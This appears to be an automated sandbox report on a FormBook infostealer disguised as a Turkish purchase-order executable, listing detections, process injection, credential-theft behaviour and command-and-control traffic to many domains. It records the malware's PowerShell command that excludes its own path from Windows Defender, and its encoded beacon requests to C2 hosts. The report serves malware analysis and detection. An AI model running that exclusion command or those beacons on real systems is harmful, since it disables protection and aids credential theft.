Windows Analysis Report
03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe

Overview

General Information

Sample name:03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
renamed because original name is a hash value
Original sample name:03.07.2024-sipari UG01072410 - Onka ve Tic a.s .exe
Analysis ID:1467071
MD5:860575aa9868349d8cbdbe70d45098c5
SHA1:6d4f34011c4a7f06ee54a15b091e0566fc38ac78
SHA256:88fcbe786b16f3cbb9292ed742d3e284d1936b20e4567cd0318effefd61fc176
Tags:exegeoTUR

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe (PID: 7512 cmdline: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" MD5: 860575AA9868349D8CBDBE70D45098C5)
    • powershell.exe (PID: 7672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe (PID: 7680 cmdline: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe" MD5: 860575AA9868349D8CBDBE70D45098C5)
      • akwoJPEqdiyPQmCnaGzo.exe (PID: 6092 cmdline: "C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fc.exe (PID: 7280 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
          • akwoJPEqdiyPQmCnaGzo.exe (PID: 3716 cmdline: "C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7656 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2aca0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2aca0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2de23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17392:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16592:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ParentProcessId: 7512, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ProcessId: 7672, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ParentProcessId: 7512, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe", ProcessId: 7672, ProcessName: powershell.exe
            No Snort rule has matched

            AV Detection

            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeReversingLabs: Detection: 34%
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeJoe Sandbox ML: detected
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: fc.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fc.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rZwD.pdbSHA256 source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: Binary string: rZwD.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2056801260.000000000083E000.00000002.00000001.01000000.0000000C.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4151437192.000000000083E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003ABF60 FindFirstFileW,FindNextFileW,FindClose,9_2_003ABF60
            Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then xor eax, eax9_2_00399670
            Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then pop edi9_2_003A245D
            Source: C:\Windows\SysWOW64\fc.exeCode function: 4x nop then mov ebx, 00000004h9_2_0302053E

            Networking

            Source: DNS query: www.qdfake525pm.xyz
            Source: Joe Sandbox ViewIP Address: 38.150.29.6 38.150.29.6
            Source: Joe Sandbox ViewIP Address: 162.0.213.72 162.0.213.72
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /a24j/?lxRlvTSh=RsceReT900EWT/dwsr4j9O4BlXzkLceVZQ7aWeUSP6prvEVffZLEO15AIWxlHKHabVj2I55FGLI5L0C49uGheAnDVqmJ9AiU0eI6N3YkeR21zvyMSZqsHmQ=&kh=9PxLvhoHS4 HTTP/1.1Host: www.qdfake525pm.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /ooz9/?lxRlvTSh=MlFGyqpiH0BFSJI/fef/dCG888BGWBIcHVtVHklmmXS6c3kDIZAL8aaEfl7Aaohh3sZenWVq3ThPiwkLLGk004Us/fWH1X98Emf9JC/rX1g9bPHIk5sfq80=&kh=9PxLvhoHS4 HTTP/1.1Host: www.66hc7.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /el0d/?lxRlvTSh=+Q7ZzK8QtvU36dLJnzucjS+TJ0IzvZmyWs7tRfA/z2Vlh6102r3Lp6tJH45cMzuZYwqpgOtAlm44C9LsA0ZyYXRYfzgEIkIQAxK9duS/lWCJ3udFt4tR1RA=&kh=9PxLvhoHS4 HTTP/1.1Host: www.katgstamps.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /nm4d/?lxRlvTSh=P+a6bS4ig9vwqW/Z6ilpMEzKmUBtQAyMrIuXDLnJaK725R5zxskqpas4OYRfTGLo7FbtQu2SDY/2/wEY0mHxpB/VyP4fcE5gLsO9P5KmHmpeamOBXX7CtdE=&kh=9PxLvhoHS4 HTTP/1.1Host: www.devele.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /k2gj/?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZSHN5jgdkAWV5BpKxies/HoRpeaidodvJqxOnF4QVVaL9HaFaof4/PPNLQo=&kh=9PxLvhoHS4 HTTP/1.1Host: www.valerieomage.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /m0xz/?lxRlvTSh=mXjiODcdBBXx02CT+mommPNahBZnOONdEz0dJALDPbptcbrNH3E9vFlm0oQl87Jfr/zi8sA6LXl9HQJlpR4v66WH/OKR7mDYMhPXwYhk+M55Q9NgI1iegHg=&kh=9PxLvhoHS4 HTTP/1.1Host: www.hissmjkl.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /735n/?lxRlvTSh=KJAlFkGNwGXoK9jXB03h4jJMHTy8Y0+g9t3JgJmyeOCBT/uylrmuLZmon7piRwxkAvV6Iq7XsIFI/+KtRdw7O50MagBKJtHJjM3XcudO1Duzw6d1NcP9VI8=&kh=9PxLvhoHS4 HTTP/1.1Host: www.monchosoft.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /4h78/?lxRlvTSh=bXG7bLU8VpdhFuw8OEWepvz+lmtIgfU4QefCRLOwt0xUHukcXkmHP9rgqbjL97YnLUFJGTOXt4l1DZESwR3Y2jPuWZfGScD+gHNftK8/3r/KPWW9Eddz3K4=&kh=9PxLvhoHS4 HTTP/1.1Host: www.theweekendcreator.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /hfb9/?lxRlvTSh=fwSRWDIDlEtpZKpO15TnR7rdvvbvUQOUwoPVjl38Pi8M+UCq29ZeNKRmFQz0yoK86tSBJtX0+7UQykNFUthSdrPfT9CD49CruGe2y7ZC/ovpvsGUE+526xA=&kh=9PxLvhoHS4 HTTP/1.1Host: www.saalameh.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /0ag0/?lxRlvTSh=ijsxwTuQWQMrQrpunY58zmHtK7oEhmVQOqZdZNdH7TeXDSEes5ptIscTzSElyzixUNFuHL69iVpfwUSC4AMHMDnys0WZTFD5qHcVGhhYgxj+QsPKbvjZ0mA=&kh=9PxLvhoHS4 HTTP/1.1Host: www.ybw73.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /tqvk/?lxRlvTSh=sqV4H0HgKEmT+MSVPZvHtNNOCugFouPGcNtakGXEq4+Q8zlVn8x6bNcZA2Wcm7hNKJFeivErhIl2wMRsNIGAokWHBtGrsDvz+bZZo+cuUvU/JTN/Qn5+SZw=&kh=9PxLvhoHS4 HTTP/1.1Host: www.kaps4kancer.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficDNS traffic detected: DNS query: www.qdfake525pm.xyz
            Source: global trafficDNS traffic detected: DNS query: www.com-kh.com
            Source: global trafficDNS traffic detected: DNS query: www.ddi828media.com
            Source: global trafficDNS traffic detected: DNS query: www.miningarea.fun
            Source: global trafficDNS traffic detected: DNS query: www.66hc7.com
            Source: global trafficDNS traffic detected: DNS query: www.katgstamps.com
            Source: global trafficDNS traffic detected: DNS query: www.devele.top
            Source: global trafficDNS traffic detected: DNS query: www.valerieomage.com
            Source: global trafficDNS traffic detected: DNS query: www.hissmjkl.com
            Source: global trafficDNS traffic detected: DNS query: www.monchosoft.com
            Source: global trafficDNS traffic detected: DNS query: www.theweekendcreator.com
            Source: global trafficDNS traffic detected: DNS query: www.saalameh.com
            Source: global trafficDNS traffic detected: DNS query: www.ybw73.top
            Source: global trafficDNS traffic detected: DNS query: www.kaps4kancer.org
            Source: global trafficDNS traffic detected: DNS query: www.vivemasvivebien.com
            Source: unknownHTTP traffic detected: POST /ooz9/ HTTP/1.1Host: www.66hc7.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 205Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.66hc7.comReferer: http://www.66hc7.com/ooz9/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 03 Jul 2024 15:46:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 2001Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:18 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:21 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:23 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 
3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:26 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 